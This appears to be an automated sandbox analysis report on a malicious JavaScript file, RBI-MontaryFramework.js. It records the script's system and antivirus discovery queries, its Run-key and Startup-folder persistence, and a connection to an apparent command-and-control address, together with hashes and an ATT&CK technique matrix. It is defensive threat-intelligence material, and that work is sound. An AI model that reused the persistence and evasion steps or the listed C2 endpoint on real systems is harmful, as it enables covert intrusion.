    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsAPI name: ['getMonth']
    Source: RBI-MontaryFramework.jsAPI name: ['getYear']
    Source: RBI-MontaryFramework.jsAPI name: ['getDate']
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 154.216.18.17 7181Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information82
    Scripting
    Valid Accounts121
    Windows Management Instrumentation
    82
    Scripting
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote ServicesData from Local System11
    Non-Standard Port
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job121
    Registry Run Keys / Startup Folder
    121
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    LSASS Memory22
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    111
    Process Injection
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets113
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    RBI-MontaryFramework.js3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://154.216.18.17:7181/is-ready0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://154.216.18.17:7181/is-readytrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    154.216.18.17
    unknownSeychelles
    135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1583511
    Start date and time:2025-01-02 22:35:51 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 16s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (Javascript)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:RBI-MontaryFramework.js
    Detection:MAL
    Classification:mal100.troj.expl.evad.winJS@6/4@0/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .js
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: RBI-MontaryFramework.js
    TimeTypeDescription
    21:37:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RBI-MontaryFramework WScript.exe //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    21:37:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RBI-MontaryFramework WScript.exe //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    21:37:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js
    No context
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SKHT-ASShenzhenKatherineHengTechnologyInformationCoHilix.ppc.elfGet hashmaliciousMiraiBrowse
    • 156.241.11.76
    Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
    • 45.207.239.71
    2.exeGet hashmaliciousXWormBrowse
    • 45.207.215.58
    1.exeGet hashmaliciousXWormBrowse
    • 45.207.215.58
    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    boatnet.arm.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    boatnet.mips.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
    • 154.216.17.216
    No context
    No context
    Process:C:\Windows\System32\wscript.exe
    File Type:ASCII text, with very long lines (1451)
    Category:dropped
    Size (bytes):671230
    Entropy (8bit):4.454422653205658
    Encrypted:false
    SSDEEP:12288:ccEK9NWMsEnjikYvYYUJm7IsRaZhLPn9e5RcHdFo9E96YQ89E4bhG:nEY5ag1C
    MD5:DC650C6F0A7EB87A4F933B24BAAB57BD
    SHA1:817BF2ECDC5341EB6E41F0F880961F338152FBEF
    SHA-256:613EE17533AE4AFC210B16B3E6E4DB3B37972B78B66342308132E75A71712164
    SHA-512:0C021D42655E19AD46CADCCDD0AACE9D0B3F4DA48ECA55DBF509237DD14FE8C47CDE53D2C2C736A564AFCBBE335C03599108B3C9514D622316FFA6CE4C2D1D4A
    Malicious:true
    Reputation:low
    Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to
    Process:C:\Windows\System32\wscript.exe
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:true
    Reputation:high, very likely benign file
    Preview:[ZoneTransfer]....ZoneId=0
    Process:C:\Windows\System32\wscript.exe
    File Type:ASCII text, with very long lines (1451)
    Category:dropped
    Size (bytes):671230
    Entropy (8bit):4.454422653205658
    Encrypted:false
    SSDEEP:12288:ccEK9NWMsEnjikYvYYUJm7IsRaZhLPn9e5RcHdFo9E96YQ89E4bhG:nEY5ag1C
    MD5:DC650C6F0A7EB87A4F933B24BAAB57BD
    SHA1:817BF2ECDC5341EB6E41F0F880961F338152FBEF
    SHA-256:613EE17533AE4AFC210B16B3E6E4DB3B37972B78B66342308132E75A71712164
    SHA-512:0C021D42655E19AD46CADCCDD0AACE9D0B3F4DA48ECA55DBF509237DD14FE8C47CDE53D2C2C736A564AFCBBE335C03599108B3C9514D622316FFA6CE4C2D1D4A
    Malicious:true
    Reputation:low
    Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to
    Process:C:\Windows\System32\wscript.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:true
    Reputation:high, very likely benign file
    Preview:[ZoneTransfer]....ZoneId=0
    File type:ASCII text, with very long lines (65536), with no line terminators
    Entropy (8bit):5.24238112158791
    TrID:
    • Java Script (8504/1) 100.00%
    File name:RBI-MontaryFramework.js
    File size:156'399 bytes
    MD5:849f2d707a526a4bb7273208ed236c95
    SHA1:897c39a63e1aedeed75bc7ec29594faaee1b811c
    SHA256:c45a0f9a9ca74ab24a212c457547f93b4f16fa4e35c4f2667865bd6359491dd2
    SHA512:d20ede56d298b278ba9934769df3810ac78bc062665130ed69522df9996cf701f10539c2be65f7874f332736372bcb26161ca08ea88c63e4326882f1d6d77267
    SSDEEP:3072:BnzAOdhGFKSk9Mj+GU33E3+wTrkVkeSK4ld/CKEE8pN8/CqamAzzn6FRdUUDDWDS:h1hjAdFh
    TLSH:97E3799B319EB57DD983A0A3D76B42CF52B90E31070BCB10D1889094B9B0577977EF8A
    File Content Preview:var dm,eW,dT,eS,dl,eQ,ef,fV,eL,dN,eU,eg,eb,dy,ds,fz,dE,fR,eC,en,fo,dI,fD,fs,eB,dk,fW,dv,dh,fp,eY,fK,dB,eE,dX,dz,eu,dZ,dn,eG,dG,ej,fS,eh,em,fI,dq,eX,dV,fx,fB,dj,fq,fQ,du,fG,gk,eq,dt,fb,dP,fM,es,dr,ek,fE,gm,dx,eN,fu,ea,fv,fk,fA,eD,eZ,eJ,fP,fw,ed,gi,dR,eP,ec
    Icon Hash:68d69b8bb6aa9a86
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
